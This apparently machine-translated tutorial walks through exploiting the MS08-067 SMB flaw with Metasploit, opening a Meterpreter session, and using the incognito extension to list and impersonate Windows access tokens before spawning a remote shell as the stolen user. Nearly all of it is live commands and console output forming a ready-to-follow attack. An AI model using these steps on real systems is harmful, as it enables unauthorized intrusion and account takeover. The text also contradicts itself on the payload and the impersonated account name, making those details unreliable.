Now we will see how to impersonate a system user without having to create a new user with administrator permissions.
First let's suppose that we have entered the PC with an exploit like :
- exploit / windows / smb / ms08067netapi
and with a PAYLOAD like :
- windows / vncinject / bind_tcp
In this case we will use the PAYLOAD windows / shell / bind_tcp . I will not explain much because many knows it .
msf console
| | | | (_) |
_ _ _| | _ _ _ | | _ | |
| ' ` \ / \ _/ ` / _| ' \| |/ \| | _|
| | | | | | _/ || (| \_ \ |) | | () | | |
|| || ||\_|\_\_,|_/ ._/||\_/|_|\_|
| |
|_|
= metasploit v3.3.2-release [core:3.3 api:1.0
- -- --= 462 exploits - 219 auxiliary
- -- --= 192 payloads - 22 encoders - 8 nops
= svn r7808 updated 16 days ago (2009.12.10)
Warning: This copy of the Metasploit Framework was last updated 16 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://dev.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use exploit/windows/smb/ms08067netapi
msf exploit(ms08067netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08067netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08067netapi) > exploit
* Started bind handler
* Automatically detecting the target...
* Fingerprint: Windows XP Service Pack 2 - lang:Spanish
* Selected Target: Windows XP SP2 Spanish (NX)
* Triggering the vulnerability...
* Sending stage (723456 bytes)
* Meterpreter session 1 opened (192.168.0.2:4661 -> 192.168.0.3:4444)
meterpreter >
- After obtaining the Meterpreter , we will execute the use plus the incognito option
meterpreter > use incognito
Loading extension incognito...success.
meterpreter >
- We look at what options you have:
- code
- meterpreter > help
Incognito Commands
==================
Command Description
------- -----------
addgroupuser Attempt to add a user to a global group with all tokens
addlocalgroupuser Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
meterpreter >
- We will use the list_tokens command . But let's see what parameters you have for execution:
code
- meterpreter > list_tokens
Usage: listtokens <listorder_option>
Lists all accessible tokens and their privilege level
OPTIONS:
-g List tokens by unique groupname
-u List tokens by unique username
meterpreter >
- Now we will show the existing users in the System:
- Code:
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
COLTEJER\ServerColtejer
NT AUTHORITY\Servicio de red
NT AUTHORITY\SERVICIO LOCAL
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter >
- Now comes the moment when we are going to supplant a user.
- Code
meterpreter > impersonate_token COLTEJER\\ServerColtejer
- Delegation token available
- Successfully impersonated user COLTEJER\ServerColtejer
meterpreter >
- Open the console or remote shell of the deprecated user. In this case the user ayman\ Serverayman
Code:
meterpreter > execute -f cmd.exe -i -t
Process 1528 created.
Channel 1 created.
Microsoft Windows XP Versi¢n 5.1.2600
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Be the First to Respond
Share Your Thoughts